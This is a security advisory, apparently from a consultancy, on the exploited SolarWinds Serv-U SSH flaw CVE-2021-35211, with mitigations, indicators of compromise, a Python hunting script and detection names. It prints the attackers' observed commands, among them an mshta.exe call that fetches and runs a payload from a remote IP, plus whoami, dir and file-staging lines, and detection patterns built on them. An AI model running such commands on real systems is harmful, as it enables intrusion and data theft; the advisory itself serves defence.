
New SolarWinds Serv-U vulnerability CVE-2021-35211 – July 15, 2021

Introduction

A 0-day remote code execution exploit is being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

The vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell (SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation gives attackers the ability to remotely run arbitrary code with the privileges of the Serv-U process, allowing them to perform actions such as installing and running malicious payloads, or viewing and changing data.

Actions

We recommend the following actions be taken to mitigate and reduce risk.

  • Apply the latest SolarWinds patch to the Serv-U software (Serv-U 15.2.3 hotfix 2 or later). The flaw is in Serv-U’s SSH implementation, so until the hotfix is installed, disable SSH on the Serv-U instance or restrict SSH access to trusted source addresses; an instance with SSH disabled is not exposed to this vulnerability.
  • Block the known malicious IP addresses and URL listed below at the perimeter. These are the indicators observed in this campaign, so blocking them limits the known actor rather than fixing the vulnerability; patching is still required.

    • 98[.]176[.]196[.]89
    • 68[.]235[.]178[.]32
    • 208[.]113[.]35[.]58
    • 144[.]34[.]179[.]162
    • 97[.]77[.]97[.]58
    • hxxp://144[.]34[.]179[.]162/a

Attack details

MSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from Serv-U.exe include:

  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > "./Client/Common/redacted.txt"
  • cmd.exe /c dir > ".\Client\Common\redacted.txt"
  • cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"

Detection guidance

Customers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A C0000005; CSUSSHSocket::ProcessReceive exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.

    EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

Additional signs of potential compromise include:

  • Recent creation of .txt files in the Client\Common\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.
  • Serv-U.exe spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for:
    • mshta.exe
    • powershell.exe
    • cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:
      • whoami
      • dir
      • ./Client/Common
      • .\Client\Common
      • type [a file path] > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive"
    • Any process with any of the following in the command line:
      • C:\Windows\Temp\
  • The addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console. It can also be checked by looking for recently created files in C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users, which appears to store the Global users information.
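
The guidance above can be turned into a small triage script. The following is an added example written for this page; it is not code from SolarWinds, Microsoft or iSecurity. It applies the log-review and process-tree indicators listed above to (a) lines from Serv-U's DebugSocketLog.txt and (b) process-creation events such as Sysmon Event ID 1 or Windows Security Event 4688, modelled as plain dicts whose field names (image, parent_image, grandparent_image, command_line) are this example's own convention. The log lines, process events and file listing embedded in it are constructed for illustration; point the functions at real exported data to use it.

```python
"""Hunting helpers for the CVE-2021-35211 post-exploitation indicators above.

Added example for this advisory, not code from SolarWinds, Microsoft or iSecurity.
It applies the detection guidance to (a) lines from Serv-U's DebugSocketLog.txt and
(b) process-creation events (e.g. Sysmon Event ID 1 or Security Event 4688), modelled
as plain dicts whose field names are this example's own convention. Sample data is constructed.
"""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Exception Microsoft associates with exploit attempts. It can also occur for
# unrelated reasons, so a hit is a trigger for deeper review, not proof.
EXCEPTION_RE = re.compile(r"EXCEPTION:\s*C0000005;\s*CSUSSHSocket::ProcessReceive", re.I)
# Children of Serv-U.exe that are not part of normal operation.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe"}
# Command-line fragments for cmd.exe spawned (directly or via conhost.exe) by Serv-U.
CMD_INDICATORS = [
    re.compile(r"\bwhoami\b", re.I),
    re.compile(r"\bdir\b", re.I),
    re.compile(r"\.[/\\]Client[/\\]Common", re.I),
    re.compile(r'\btype\b.*>\s*"?C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\.+\.Archive', re.I),
]
# Fragment that is suspicious in any process, whatever its parent.
ANY_PROCESS_INDICATOR = re.compile(r"C:\\Windows\\Temp\\", re.I)
# Network IOCs from the advisory, kept defanged as published.
DEFANGED_IOCS = ["98[.]176[.]196[.]89", "68[.]235[.]178[.]32", "208[.]113[.]35[.]58",
                 "144[.]34[.]179[.]162", "97[.]77[.]97[.]58"]


def refang(ioc):
    """Turn defanged notation (1[.]2[.]3[.]4, hxxp://) into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")


IOCS = [refang(i) for i in DEFANGED_IOCS]


def find_exploit_exceptions(log_lines):
    """Return (line_no, line) for every ProcessReceive access-violation entry."""
    return [(n, ln) for n, ln in enumerate(log_lines, 1) if EXCEPTION_RE.search(ln)]


def classify_process_event(event):
    """Return the reasons an event matches the guidance; an empty list means no match."""
    def name(key):
        return PureWindowsPath(event.get(key, "")).name.lower()
    image, parent, grandparent = name("image"), name("parent_image"), name("grandparent_image")
    cmdline = event.get("command_line", "")
    reasons = []
    from_servu = parent == "serv-u.exe" or (parent == "conhost.exe" and grandparent == "serv-u.exe")
    if from_servu and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"Serv-U.exe spawned {image}")
        if image == "cmd.exe":
            reasons += [f"cmd.exe command line matches {p.pattern!r}"
                        for p in CMD_INDICATORS if p.search(cmdline)]
    if ANY_PROCESS_INDICATOR.search(cmdline):
        reasons.append("command line references C:\\Windows\\Temp\\")
    reasons += [f"command line contains IOC {i}" for i in IOCS if i in cmdline]
    return reasons


def recent_client_common_txt(files, now, window=timedelta(days=30)):
    """From (path, mtime) pairs, return .txt files under Client\\Common modified within the window."""
    hits = []
    for path, mtime in files:
        p = PureWindowsPath(path)
        parts = [s.lower() for s in p.parts]
        under_client_common = any(parts[i:i + 2] == ["client", "common"] for i in range(len(parts) - 1))
        if under_client_common and p.suffix.lower() == ".txt" and now - mtime <= window:
            hits.append(path)
    return hits


SERVU = r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe"
SAMPLE_EVENTS = [  # constructed; command lines modelled on the "Attack details" list above
    {"parent_image": SERVU, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c whoami > "./Client/Common/redacted.txt"'},
    {"parent_image": SERVU, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"C:\Windows\System32\mshta.exe http://144.34.179.162/a"},
    {"parent_image": r"C:\Windows\System32\conhost.exe", "grandparent_image": SERVU,
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r'cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c dir C:\Users"},  # an admin's own shell, not a Serv-U child
]
SAMPLE_LOG = [  # constructed DebugSocketLog.txt excerpt; the second entry is the exception quoted above
    "Thu 15Jul21 10:12:03 - SSH session opened",
    "EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; "
    "nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5",
    "Thu 15Jul21 10:12:09 - SSH session closed",
]
NOW = datetime(2021, 7, 15, 12, 0)
SAMPLE_FILES = [  # constructed (path, mtime) pairs such as a directory walk would yield
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\redacted.txt", NOW - timedelta(hours=3)),
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\index.htm", NOW - timedelta(hours=3)),
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\old.txt", NOW - timedelta(days=400)),
]

if __name__ == "__main__":
    print("exception lines:", [n for n, _ in find_exploit_exceptions(SAMPLE_LOG)])
    for ev in SAMPLE_EVENTS:
        print(PureWindowsPath(ev["image"]).name, "->", classify_process_event(ev) or "no match")
    print("recent Client\\Common .txt:", recent_client_common_txt(SAMPLE_FILES, NOW))
```

The cmd.exe command-line indicators are only evaluated for children of Serv-U.exe (directly or through conhost.exe), because words like dir and whoami are far too common to hunt across every process; the C:\Windows\Temp\ fragment and the network IOCs are checked for every event, as the guidance above states. A hit on the DebugSocketLog exception alone is a prompt to pull the process and file evidence for the same host and time window, not a confirmed compromise.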

Detection details

Antivirus detections
Microsoft Defender Antivirus detects threat components as the following malware:

  • Behavior:Win32/ServuSpawnSuspProcess.A
  • Behavior:Win32/ServuSpawnCmdClientCommon.A

Endpoint detection and response (EDR) alerts
Alerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:

  • Suspicious behavior by Serv-U.exe

Azure Sentinel query
To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)
  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp

Lastly, to those who are leveraging our 24/7 Healthcare Security Operations Center (SOC) / SIEM service: your network is being monitored and we will provide regular updates. To those who are not, please feel free to reach out to raheel.qureshi@isecurityconsulting.com or kees.pouw@isecurityconsulting.com and we will add you to our distribution list.

We will also provide updates to organizations we are servicing through our Incident Response Retainer.

Do not panic, but stay safe and protected. We can always connect with you 1-on-1 to provide better guidance on how to gain better visibility into your controls, network, dark web exposure, privileged user access protection and active threat hunting. The landscape around ransomware has evolved: the Healthcare sector has shown it is willing to pay ransoms, and malicious threat actors are now stronger than ever.

Please go ahead and share this with your peers.

For any other questions or concerns, please feel free to reach out to info@isecurityconsulting.com.

Best Regards,

The iSecurity Team